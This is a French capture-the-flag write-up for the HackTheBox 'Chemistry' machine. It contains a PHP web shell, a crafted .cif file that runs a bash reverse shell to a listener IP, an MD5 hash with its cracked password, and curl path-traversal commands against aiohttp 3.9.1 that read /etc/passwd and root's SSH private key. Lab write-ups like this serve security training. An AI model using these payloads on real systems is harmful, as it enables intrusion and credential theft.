Chemistry HackTheBox (Writeup)

Skills:

File Upload Abuse (injection in a .cif file
Exposing database content
MD5 hash decryption
Python 3.9 aioHttp LFI explotation

Reconnaissance:

Création de l'espace de travail :

Nous établirons notre espace de travail en créant trois dossiers pour stocker les contenus importants, les exploits et les résultats de la reconnaissance à l'aide de Nmap.

Vérification de la Connectivité VPN

Vérification de la connexion VPN pour assurer une communication stable avec la machine cible.

Recherche des ports ouverts avec Nmap :

Exploration des ports ouverts et exportation dans le fichier "allPorts" dans le répertoire Nmap:

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.11.38 -oG allPorts

Analyse des ports ouverts avec extractPorts:

Utilisation de la fonction extractPorts pour afficher de manière synthétique les ports ouverts et les copier dans le clipboard (22,5000)

Scan de la version des ports avec Nmap:

Utilisation de Nmap pour scanner la version des ports et extraction des informations dans le fichier "targeted" :

nmap -sCV -p5000,22 10.10.11.38 -oN targeted

Pour résoudre les noms de domaine en adresses IP via DNS, on insère dans le fichier /etc/hosts le nom de domaine associé à son adresse IP:

Premièrement, nous nous inscrivons sur le site cible.

Vulnérabilité File Upload Abuse (.cif file)

Le site nous demande de téléverser un fichier .CIF.

Tentative cmd.php

Pour tous les scénarios ci-dessous, nous allons utiliser le fichier PHP suivant, nommé "cmd.php", qui nous permettra d'injecter des commandes au niveau du système du serveur :

<?php
system($_GET['cmd']);
?>

Cependant, nous rencontrons un code d'erreur. "~~Method Not Allowed~~"

Nous interceptons la requête avec BurpSuite.

Nous essayons plusieurs types d'exploitations (validation côté client, extension personnalisée avec .htaccess, le nom du fichier devant contenir "cif", vérification du type de fichier, conversion en MD5, etc.), mais aucun n'a fonctionné.

CIF Code Injection:

Après une recherche sur Internet, nous trouvons la possibilité d'injecter du code malveillant dans un fichier .cif.

Arbitrary code execution when parsing a maliciously crafted JonesFaithfulTransformation transformation_stringGitHub

Voici le contenu du fichier cmd.cif pour nous verser une revershell:

data_Example
_cell_length_a    10.00000
_cell_length_b    10.00000
_cell_length_c    10.00000
_cell_angle_alpha 90.00000
_cell_angle_beta  90.00000
_cell_angle_gamma 90.00000
_symmetry_space_group_name_H-M 'P 1'
loop_
 _atom_site_label
 _atom_site_fract_x
 _atom_site_fract_y
 _atom_site_fract_z
 _atom_site_occupancy


 H 0.00000 0.00000 0.00000 1
 O 0.50000 0.50000 0.50000 1

_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("/bin/bash -c \'sh -i >& /dev/tcp/10.10.15.35/4444 0>&1\'");0,0,0'
_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "

Nous nous connectons ensuite avec netcat (nc) sur le port 4444.

Élévation de privilèges :

Une fois que vous avez accès au serveur Linux, voici les commandes à effectuer pour le traitement en terminal :

script /dev/null -c bash
#contrôle Z

stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash
stty rows 44 columns 184

Cela permettra de travailler de manière beaucoup plus efficace et surtout plus confortable.

Nous découvrons une base de données nommée database.db.

Exploration de la base de données :

Avec sqlite3, nous accédons au contenu de la base :

sqlite3
.tables 
SELECT * FROM user;

L'objectif est de trouver le mot de passe de l'utilisateur rosa.

Mots de passe déchiffrés en MD5 :

CrackStation - Online Password Hash Cracking - MD5, SHA1, Linux, Rainbow Tables, etc.crackstation.net

rosa:63ed86ee9f624c7b14f1d4f43dc251a5 -> unicorniosrosados

Nous nous connectons ensuite via SSH :

ssh [email protected]

Flag User.txt:

Vulnérabilité LFI http Python 3.9

Si l'on utilise curl pour afficher le contenu du port interne web 8080, on remarque qu'une version vulnérable de Python 3.9 est en cours d'exécution, précisément aiohttp/3.9.1.

GitHub - z3rObyte/CVE-2024-23334-PoC: A proof of concept of the path traversal vulnerability in the python AioHTTP library =< 3.9.1GitHub

Lister le contenu de /etc/passwd

Nous pouvons lister le contenu du fichier /etc/passwd en utilisant la commande suivante :

curl -s --path-as-is http://localhost:8080/assets/../../../../etc/passwd

Accéder à la clé SSH privée de root

Étant donné que l'on peut parcourir les fichiers du système, nous allons maintenant tenter de récupérer la clé SSH privée de l'utilisateur root :

curl -s --path-as-is http://localhost:8080/assets/../../../../root/.ssh/id_rsa

Flag root :)

Connexion SSH avec la clé récupérée

Une fois la clé récupérée, nous pouvons nous connecter en SSH à la machine cible en utilisant la commande suivante :

ssh -i id_rsa [email protected]

Mis à jour il y a 1 an

Ce contenu vous a-t-il été utile ?